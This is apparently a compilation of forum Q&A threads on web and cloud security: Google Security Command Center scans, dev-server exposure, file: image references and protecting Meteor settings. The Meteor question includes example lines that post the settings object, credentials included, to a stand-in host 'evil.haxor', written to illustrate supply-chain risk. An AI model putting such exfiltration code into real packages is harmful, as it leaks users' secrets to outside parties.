Vulnerabilities shown in Security Command Center(SCC) Dashboard in Google Cloud - security

Vulnerabilities shown in Security Command Center Dashboard
Security Command Center Dashboard in Google Cloud shows a bunch of vulnerabilities, we have fixed so few issues and its not clear how to initiate another assessment of vulnerabilities seen across all assets. How can we trigger this?

There are 2 types of vulnerabilities shown in the Security Command Center:
Security Health Analytics: this one (currently in beta) runs automatically twice a day, 12-hours apart. As of now it can't be run manually.
Web Security Scanner: this one essentially display results of the Web Security Scan that you can set up and run yourself as described here.

I guess that you want to relaunch a scan to view if your action are now "green". However, keep in mind that your target is not to have 0 vulnerabilities reported by SCC, but to have 0 issue that enforces YOUR security policy.
For example, a firewall rule open in 0.0.0.0/0 will appear as a vulnerabilities. It could be, or not. If you have a Loadbalancer, created manually or by GKE, this firewall rules is created automatically. Is it a vulnerability?
Yes if you don't want any external access.
No if it's your website and you want to allow all people across the world to browse it.
Same case for bucket with public access. Public for serving static content like images or videos? or Public with restricted data that nobody outside the company should see?
SCC is simply a tool, act wisely!

Related

How can I prevent 3rd-party packages from having direct access to Meteor.settings?

I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I want to be able to protect my settings from 3rd parties.
Scenario:
I have sensitive data in my Meteor.settings file, especially in production, because that is the current best-practice place to put them.
I use a 3rd party meteor package such as iron:router, but possibly one by a lesser known author.
One of the 3rd party packages looks up my Meteor.settings and does an HTTP post on which some of my settings are sent along.
HTTP.post('http://evil.haxor', Meteor.settings) # all ur settings
Boom. Instantly I've leaked my production credentials, my payment gateway, Amazon, or whatever. Worse, as far as I know, the code that steals my settings might be loaded in and eval'd so I don't even see the string "Meteor.settings" in the source of the package.
I've tested, and the two things are allowed in 3rd party pacakges:
Meteor.settings.foo = "foobar" # why u change my settings?
eval("HTTP.post('evil.haxor', Meteor.settings)") # nooooo
I'm amenable to hacky solutions. I know the Meteor team might not address this right away, given all on their plates (Windows support, a non-Mongo DB).. I just want to be able to provide this level of security to my company, for whom I think it would concern their auditors to discover this level of openness. Otherwise I fear I'm stuck manually security auditing every package I use.
Thank you for your consideration!
Edit: I see now that the risk of a package seeing/stealing the settings is essentially the same problem as any package reading (or writing) your filesystem. And the best way to address that would be to encrypt. That's a valid proposal, which I can use immediately. However, I think there could, and should be notions of 'package-scoped' settings. Also, the dialogue with commenters made me realize that the other issue, the issue of settings being (easily) modifiable at runtime, could be addressed via making the settings object read-only, using ES5 properties.
A malicious npm package can come with native code extensions, access the filesystem directly, and in general do anything the rest of the code in the app can do.
I see 2 (partial) solutions:
set up a firewall with outbound rules and logging. Unfortunately if your application communicates with any sort of social network (facebook, twitter) then the firewall idea will not handle malware that uses twitter as a way to transmit data. But maybe it would help?
lock down the DNS resolution, provide a whitelist of DNS lookups. This way you could spot if the app starts trying to communicate with 'evil.haxor'
There are other more advanced detectors - but at some point a hacker is going to go after the other services running on the box and not try for modifying your code.
Good luck. And its good to be paranoid -- because they really are out to get you.

Is there any reason why a dev server should be accessible from the internet?

This is a very generic question that popped up in my mind. The reason has been that I came across a website dev server which leaked sensitive information about a database connection due an error. I was stunned at first and now I wonder why someone puts a development server out in the internet and make it accessible to everyone?
For me there is no reason for doing this.
But it certainly did not happen by accident that a company created a subdomain (dev.example.com) and pushed development code to it. So what could be the reason to ignore the fact of high security risk?
A quick search did not bring up any information about this. I'm interested in any further readings about this specific topic.
Thank you in advance
There is no reason for your dev servers to be accessible by the general public.
As a customer I just had an experience with a private chef site where I spent time interacting with their dev server because it managed to get crawled by Bing. Everything was the same as the live site but I got increasingly frustrated because paying a deposit failed to authorise. The customer support team had no idea I was on the wrong site either. The only difference was the URL. My e-mail address is now in their test system sending me spam every night when they do a test run.
Some options for you to consider, assuming you don't want to change the code on the page:
IP Whitelisting is the bare minimum
Have a separate login page that devs can use that redirects to the dev site with the correct auth token - bonus points for telling stray users that this is a test side and the live site is at https://.....
Use a robots.txt to make sure you don't get indexed
Hide it all behind a VNET - this really isn't an issue anymore with VPNs or services like Bastion.
Also consider the following so your devs/testers don't accidentally use the wrong site:
Have a dev css to make it obvious its a test system (this assumes you do visual testing later in your pipeline)
Use a banner to make it clear this is a dev site
Note that this would be a dev server. If you are using ringed/preview/progressive deployment then these should work just as well as the live site because they are the live site.
It's extremely common for a development environment or any "lower level" environment for that matter to be exposed to the pubic internet. Today, especially with more and more companies working in the public cloud and having remote team members, it's extremely more productive to have your development team or UAT done without having the need to set up a VPN connection or a faster more expensive direct connections to the cloud from your company's on premise network.
It's important to mention that exposing to the public internet does not mean that you shouldn't have some kind of HTTP Authentication in these environments that hides the details of your website. You can also use a firewall with an IP address whitelist. This is still very important so you don't expose your product and lose a possible competitive advantage. It's also important because lower level environments tend to be more error prone and important details about the inner workings of your application may accidentally show up.

Will referencing a website image on a local network compromise network security?

I manage a website for an organization that has a network where several hundred users will access it in any given 15 minute period. When a user opens a browser, the organization's homepage is displayed. This homepage has several images on it. To try to save on bandwidth to the remote web server (which is not at all affiliated with the local network), the index file checks the ip address of the requester and if it is coming from within the network, it displays a modified webpage where the images are pulled from a local shared drive on the network.
Essentially, the code is this:
<image src="file:\\\D:/hp/picture.jpg" />
I've been told by the network administrator that this is unacceptable because of the great security risk it poses and that the folder must be deleted immediately.
I'm pretty sure it's not a risk because it's the browser that requests the file from the local network and not the remote server and the only way the picture could be displayed is if the request came from the local network which all users have access to the drive in question anyway.
Is there something I am overlooking here? Can this single image tag cause a "great security risk" to the network?
Some background to prevent the obvious questions that will arise from this:
Browser caches are cleared every time a new user logs on to a machine. New users log in roughly every 15 minutes on over 500 machines.
I've requested to have a proxy cache server set up globally for the network. The network administrators flat out refused to do this
Hosting from within the network is out of the question (again, by the decree of the network administrator)
I have no control over the network or have any part in the decisions that are made.
Every user has read access to this shared drive and they all have write access to at least some of the 100 or so directories within it.
The network is not remotely accessible by remote users (you must be logged in to a machine physically plugged into the network to access the network or any drive on it)
Thanks in advance for your help on this.
Why don't you use the very same server which serves the shared directory to share the images over HTTP, and just use:
<image src="http://local-server/images/hp/picture.jpg" />
You already have a server, it's a matter of using the proper software.
Regarding another of your points, it might be dangerous. You're allowing your browser to access local files requested by remote websites. I can't think of any exploits of the top of my head, but I'd rather avoid this sort of uncommon practice. You should not do something until you're sure it's safe (for now you're just unsure it's unsafe).
Is the tag itself a "great security risk"? Of course not -- any site can do the same (as you said, IE8 "happily opens everything you ask"). And therein lies the risk: should any website to be allowed to coerce the client into opening arbitrary network files?
From a security standpoint, the problem is likely not the image tag itself, but rather that this functionality requires that Internet sites be allowed to coerce access local resources (over the file: protocol) in the client's security context. Even with same-origin policy, this is potentially dangerous, and consequently modern browsers do not allow it.
Beginning with IE9, Microsoft disallows accessing the file: protocol from sites in the Internet zone, and "strongly discourages" disabling this feature. Other modern browsers have similar functionality.
Presumably, the network administrators will eventually need to upgrade from IE8. Upgrading to a newer browser will prevent, by default, the locally-accessed images from loading. So the organization then ultimately has a few choices:
Turn off this security setting, allowing any website to reference local content
Not upgrade, and use IE8 in perpetuity
Run the website in the "Trusted Zone", which by default will permit the site to do anything the user can do (start processes, delete files, read data, etc.).
Develop custom software (BHOs, custom applications, HTAs, etc.) or use COTS software to load the images locally, bypassing the default IE behavior.
Accept the usability impact associated with not showing the local images
Option (1) is clearly a security issue, since it requires disabling a security setting that prevents non-local websites from reading local content. Option (2) presents it own security issues, since older browsers lack some of the security features of newer browsers (like blocking file: protocol access from the Internet zone). Option (3) requires an administrative configuration change, violates least access principles, and (particularly if the site lacks server verification (SSL)) opens the organization to a new and potentially-devastating attack vector.
That leaves Option 4 -- development/deployment of software for this purpose; and Option 5 -- block the images from being displayed.
In the end, the administrators will likely have a strong security interest in moving away from IE8, and an implementation that uses a behavior new browsers do not support can impede such an upgrade, and could reasonably contradict the security interests of the organization.

Limit ip access by creating a new browser?

i don't know if this is the best approach, but here is it:
I've made a system in django and only want the users in a lab to be able to access it, so they can't go to other web pages(it's a program that the students can answer some tests).
I've read that doing the proxy stuff to limit the IP is very easily bypassed(since all the students from IT).
Them I read somewhere that you can create your own "Chrome" or firefox browser.
And it made me wander if I can make a browser that can only access one domain (in this case my project domain). This way it would be more invisible to the users what's going on.
But I can't find any good references to do this, and don't know if this is a complicated stuff.
Is it necessary to change the code of an existing browser? or can I just create a extension for it?
Why not do your test on a fixed private network where the only IP address that the connected machines can see is the one with the test. Any requests to external pages will fail because the Internet won't be reachable.
Editing a browser is possible, but is likely that it will be simulteniously excessive for what you want and insufficient to stop users from getting content that you don't want them to have.

How should I wall off the dev and/or beta sites -- from the public and search engine bots?

I need dev and beta sites hosted on the same server as the production environment (let's let that fly for practical reasons).
To keep things simple, I can accept the same protections in place on both dev and beta -- basically don't let it get spidered, and put something short of user names and passwords in place to prevent everyone and their brother from gaining access (again, there's a need to be practical). I realize that many people would want different permissions on dev than on beta, but that's not part of the requirements here.
Using robots.txt file is a given, but then the question: should the additional host(s) (aka "subdomain(s)") be submitted to the Google Webmaster tools as an added preventive measure against inadvertent spidering? It should go without saying, but there will be no linking into the dev/beta sites directly, so you'd have to type in the address perfectly (with no augmentation by URL Rewrite or other assistance).
How could access be restricted to just our team? IP addresses won't work because of the various methods of internet access (meetings at lunch spots with wifi, etc.).
Perhaps having dev/beta and production INCLUDE a small file (or call a component) that looks for URL variable to be set (on the dev/beta sites) or does not look for the URL variable (on the production site). This way you could leave a different INCLUDE or component (named the same) on the respective sites, and the source would otherwise not require a change when it's moved from development to production.
I really want to avoid full-on user authentication at any level (app level or web server), and I realize that leaves things pretty open, but the goal is really just to prevent inadvertent browsing of pre-production sites.
Usually I see web server based authentication with a single shared username and password for all users, this should be easy to set up. An interesting trick might be to check for a cookie instead, and then just have a better hidden page to set that cookie. You can remove that page when everyone's visited it, or implement authentication just for that file, or allow access to it just from the office and require people working from home to use VPN or visit the office if they clear their cookies.
I have absolutely no idea if this is the "proper" way to go about doing it, but for us we place all Dev and Beta sites on very high port numbers that crawlers/spiders/indexers never go to (in fact, I don't know of any off the top of my head that go beyond port 80 unless they're following a direct link).
We then have a reference index page listing all of the sites with links to their respective port numbers, with only that page being password-protected. For sites involving real money transactions or other sensitive data, we display a short red bar on top of the website explaining that it is just a demo server, on the very rare chance that someone would directly go to a Dev URL and Port #.
The index page is also on a non-standard (!= 80) port. But even if a crawler were to reach it, it wouldn't get past the password input and would never find the direct links to all the other ports.
That way your developers can access the pages with direct URLs and Ports, and they have a password-protected index for backup should they forget.

Resources